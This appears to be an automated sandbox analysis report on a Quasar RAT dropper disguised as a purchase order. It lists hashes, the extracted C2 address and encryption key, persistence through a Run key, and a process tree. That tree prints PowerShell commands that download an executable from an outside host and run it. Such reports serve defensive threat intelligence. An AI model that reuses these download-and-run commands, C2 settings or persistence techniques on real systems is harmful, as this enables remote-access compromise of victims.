Analysis
-
max time kernel
93s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240729-en -
resource tags
arch:x64arch:x86image:win10v2004-20240729-enlocale:en-usos:windows10-2004-x64system -
submitted
30-07-2024 01:19
Static task
static1
Behavioral task
behavioral1
Sample
jdconstructnOrderfdp..exe
Resource
win7-20240704-en
General
-
Target
jdconstructnOrderfdp..exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Extracted
quasar
1.4.1
Office04
192.228.105.2:4782
4ea5c3e6-40ed-401e-8a68-e96daa2a46a9
-
encryption_key
0FE4B3C613E3E61C318BA9D568DC6A8C56D2E505
-
install_name
jorder.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svchost
-
subdirectory
SubDir
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2308-40-0x0000000005390000-0x00000000056B5000-memory.dmp family_quasar behavioral2/memory/2308-41-0x0000000005E10000-0x0000000006134000-memory.dmp family_quasar -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 4 3960 powershell.exe 12 4356 powershell.exe -
Processes:
powershell.exepowershell.exepid process 3960 powershell.exe 4356 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exe net_reactor behavioral2/memory/2308-33-0x00000000000C0000-0x000000000012E000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
jdconstructnOrderfdp..exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-735441492-2964205366-2526932795-1000\Control Panel\International\Geo\Nation jdconstructnOrderfdp..exe -
Executes dropped EXE 1 IoCs
Processes:
networkrunfdp.exepid process 2308 networkrunfdp.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
networkrunfdp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-735441492-2964205366-2526932795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkRun.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\networkrunfdp.exe" networkrunfdp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jdconstructnOrderfdp..exenetworkrunfdp.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdconstructnOrderfdp..exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language networkrunfdp.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3960 powershell.exe 3960 powershell.exe 4356 powershell.exe 4356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exenetworkrunfdp.exedescription pid process Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 2308 networkrunfdp.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
networkrunfdp.exepid process 2308 networkrunfdp.exe 2308 networkrunfdp.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
networkrunfdp.exepid process 2308 networkrunfdp.exe 2308 networkrunfdp.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
jdconstructnOrderfdp..execmd.exedescription pid process target process PID 4480 wrote to memory of 2364 4480 jdconstructnOrderfdp..exe cmd.exe PID 4480 wrote to memory of 2364 4480 jdconstructnOrderfdp..exe cmd.exe PID 2364 wrote to memory of 3960 2364 cmd.exe powershell.exe PID 2364 wrote to memory of 3960 2364 cmd.exe powershell.exe PID 2364 wrote to memory of 4356 2364 cmd.exe powershell.exe PID 2364 wrote to memory of 4356 2364 cmd.exe powershell.exe PID 2364 wrote to memory of 2308 2364 cmd.exe networkrunfdp.exe PID 2364 wrote to memory of 2308 2364 cmd.exe networkrunfdp.exe PID 2364 wrote to memory of 2308 2364 cmd.exe networkrunfdp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\71D4.tmp\71E5.tmp\71E6.bat C:\Users\Admin\AppData\Local\Temp\jdconstructnOrderfdp..exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4356 -
C:\Users\Admin\AppData\Local\Temp\networkrunfdp.exenetworkrunfdp.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2308
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a2b24af1492f112d2e53cb7415fda39f
SHA1dbfcee57242a14b60997bd03379cc60198976d85
SHA256fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073
SHA5129919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
417KB
MD5a18b7de2990becc30f700720e19ebfef
SHA1b48c1a5c7756bccfe05d7999daeb96e7ab688cfd
SHA2562bf98c947ce0bd8e6e6a0c0493af056790d61ab86c7c47896b4688bdc60b68b5
SHA512484f8faf3973b74c96b6fea157774c627044fa4631e127de30f9f93468d38e73befa3c3bff3ea07108c82d943c9b56e79c5d6391d0e3a9b197869b0715d2808b